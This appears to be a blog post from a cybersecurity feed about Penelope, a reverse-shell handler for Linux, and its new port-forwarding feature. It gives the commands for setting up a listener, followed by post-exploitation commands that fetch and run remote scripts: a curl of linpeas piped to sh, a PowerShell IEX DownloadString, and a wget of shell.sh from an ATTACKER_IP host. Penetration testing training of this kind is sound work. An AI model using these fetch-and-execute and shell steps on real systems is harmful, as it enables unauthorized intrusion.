Penelope: The Ultimate Linux Shell Handler Now with Port Forwarding Support

By /

Listen to this Post

Penelope, the advanced Linux shell handler, has just gotten even better with the addition of port forwarding support. This means if a local web service is running on a victim machine (without external exposure), you can now access it from Kali after gaining a shell via Penelope.

Created by Christodoulos Lamprinos, Penelope stands out as one of the best shell handlers due to its powerful features:

  • πŸ–₯️ Auto TTY Upgrade – Instantly upgrades your shell without manual intervention.
  • 🧠 Run LinPEAS in the Background – Conduct recon without uploading files, using separate sessions.
  • 🌐 Port Forwarding – Now supports accessing internal victim services remotely.

GitHub Repository

πŸ”— https://github.com/brightio/penelope

You Should Know: Essential Penelope Commands & Techniques

1. Setting Up Penelope

git clone https://github.com/brightio/penelope.git 
cd penelope 
chmod +x penelope.py 
./penelope.py -h

2. Starting a Listener

./penelope.py -l -p 4444

3. Auto TTY Upgrade

Penelope automatically upgrades your shell to a fully interactive TTY, eliminating the need for:

python3 -c 'import pty; pty.spawn("/bin/bash")'

4. Running LinPEAS in the Background

Instead of manually uploading LinPEAS, Penelope allows background execution:

curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

5. Port Forwarding (New Feature)

Access internal victim services (e.g., localhost:8080) from your Kali machine:

 On Penelope session 
portfwd add -l 9000 -r 127.0.0.1 -p 8080

Now, access `localhost:9000` on Kali to reach the victim’s `8080` service.

6. Post-Exploitation with Penelope

  • Check open ports on victim (Linux):
    netstat -tulnp
  • Check Windows outbound ports (if needed):
    IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Y3llowDuck/port_check_PowerShell/main/port_check.ps1')

What Undercode Say

Penelope is a game-changer for penetration testers and red teamers, especially during exams like OSCP. Its auto-TTY, background LinPEAS execution, and now port forwarding make post-exploitation smoother.

Additional Linux & Windows Commands for Security Testing

  • Linux:
    Check running processes 
ps aux 
Find SUID binaries 
find / -perm -4000 2>/dev/null 
Download files from attacker machine 
wget http://ATTACKER_IP/shell.sh -O /tmp/shell.sh
  • Windows:
    Check firewall rules 
netsh advfirewall firewall show rule name=all 
List scheduled tasks 
schtasks /query /fo LIST /v 
Test port connectivity 
Test-NetConnection -ComputerName google.com -Port 443

Expected Output:

A fully interactive Penelope session with port forwarding enabled, allowing seamless access to internal victim services.

πŸ”— GitHub: https://github.com/brightio/penelope

References:

Reported By: Activity 7316453255054520320 – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass βœ…

Join Our Cyber World:

πŸ’¬ Whatsapp | πŸ’¬ TelegramFeatured Image

Related Posts: